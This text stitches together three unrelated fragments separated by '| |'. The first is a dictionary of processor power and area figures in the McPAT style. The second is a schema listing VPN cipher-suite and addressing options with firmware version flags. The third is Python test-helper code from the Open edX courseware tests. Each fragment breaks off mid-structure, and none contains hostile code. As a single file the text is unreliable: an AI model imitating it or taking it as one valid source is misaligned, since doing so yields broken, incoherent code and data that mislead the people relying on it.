'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.174315,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.281163,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.141922,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.597399,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.199365,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.21299,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00731154,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0528716,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0540733,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0528716,
'Execution Unit/Register Files/Runtime Dynamic': 0.0613848,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.111386,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.291762,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.55861,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00233622,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00233622,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.0021177,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000865114,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000776767,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00756691,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0194391,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.051982,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.30651,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.175856,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.176554,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.68549,
'Instruction Fetch Unit/Runtime Dynamic': 0.431399,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00567966,
'L2/Runtime Dynamic': 0.00181095,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.49482,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.606984,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0406895,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0406894,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.68696,
'Load Store Unit/Runtime Dynamic': 0.848339,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.100333,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.200666,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0356086,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0356682,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.205586,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0289046,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.422865,
'Memory Management Unit/Runtime Dynamic': 0.0645729,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.6035,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00786459,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0889693,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': | |
"value": "aes256gcm-prfsha256",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aes256gcm-prfsha384",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aes256gcm-prfsha512",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "chacha20poly1305-prfsha1",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "chacha20poly1305-prfsha256",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "chacha20poly1305-prfsha384",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "chacha20poly1305-prfsha512",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria128-md5",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria128-sha1",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria128-sha256",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria128-sha384",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria128-sha512",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria192-md5",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria192-sha1",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria192-sha256",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria192-sha384",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria192-sha512",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria256-md5",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria256-sha1",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria256-sha256",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria256-sha384",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria256-sha512",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "seed-md5",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "seed-sha1",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "seed-sha256",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "seed-sha384",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "seed-sha512",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"type": {
"type": "string",
"options": [
{
"value": "static",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "dynamic",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "ddns",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"authusrgrp": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"reauth": {
"type": "string",
"options": [
{
"value": "disable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "enable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"ipv4_dns_server3": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"ipv4_exclude_range": {
"type": "list",
"children": {
"start_ip": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"end_ip": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"id": {
"type": "integer",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
},
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": | |
"""
Helpers for courseware tests.
"""
import ast
import json
from collections import OrderedDict
from datetime import timedelta
from django.contrib import messages
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.test import TestCase
from django.test.client import Client, RequestFactory
from django.urls import reverse
from django.utils.timezone import now
from xblock.field_data import DictFieldData
from common.djangoapps.edxmako.shortcuts import render_to_string
from lms.djangoapps.courseware.access import has_access
from lms.djangoapps.courseware.utils import verified_upgrade_deadline_link
from lms.djangoapps.courseware.masquerade import MasqueradeView
from lms.djangoapps.courseware.masquerade import setup_masquerade
from lms.djangoapps.lms_xblock.field_data import LmsFieldData
from openedx.core.djangoapps.content.course_overviews.models import CourseOverview
from openedx.core.lib.url_utils import quote_slashes
from common.djangoapps.student.models import CourseEnrollment, Registration
from common.djangoapps.student.tests.factories import CourseEnrollmentFactory, UserFactory
from common.djangoapps.util.date_utils import strftime_localized_html
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.tests.django_utils import TEST_DATA_MONGO_MODULESTORE, ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from xmodule.tests import get_test_descriptor_system, get_test_system
class BaseTestXmodule(ModuleStoreTestCase):
"""Base class for testing Xmodules with mongo store.
This class prepares course and users for tests:
1. create test course;
    2. create, enroll, and log in users for this course;
    Any xmodule test should override only the following parameters:
1. CATEGORY
2. DATA or METADATA
3. MODEL_DATA
4. COURSE_DATA and USER_COUNT if needed
This class should not contain any tests, because CATEGORY
should be defined in child class.
"""
MODULESTORE = TEST_DATA_MONGO_MODULESTORE
USER_COUNT = 2
COURSE_DATA = {}
# Data from YAML common/lib/xmodule/xmodule/templates/NAME/default.yaml
CATEGORY = "vertical"
DATA = ''
    # METADATA must be overridden in every subclass that uses it. Otherwise,
    # a change made to it in one test would leak into every other subclass of
    # this parent class.
METADATA = {}
MODEL_DATA = {'data': '<some_module></some_module>'}
def new_module_runtime(self):
"""
Generate a new ModuleSystem that is minimally set up for testing
"""
return get_test_system(course_id=self.course.id)
def new_descriptor_runtime(self):
runtime = get_test_descriptor_system()
runtime.get_block = modulestore().get_item
return runtime
def initialize_module(self, **kwargs): # lint-amnesty, pylint: disable=missing-function-docstring
kwargs.update({
'parent_location': self.section.location,
'category': self.CATEGORY
})
self.item_descriptor = ItemFactory.create(**kwargs)
self.runtime = self.new_descriptor_runtime()
field_data = {}
field_data.update(self.MODEL_DATA)
student_data = DictFieldData(field_data)
self.item_descriptor._field_data = LmsFieldData(self.item_descriptor._field_data, student_data) # lint-amnesty, pylint: disable=protected-access
self.item_descriptor.xmodule_runtime = self.new_module_runtime()
self.item_url = str(self.item_descriptor.location)
def setup_course(self): # lint-amnesty, pylint: disable=missing-function-docstring
self.course = CourseFactory.create(data=self.COURSE_DATA)
# Turn off cache.
modulestore().request_cache = None
modulestore().metadata_inheritance_cache_subsystem = None
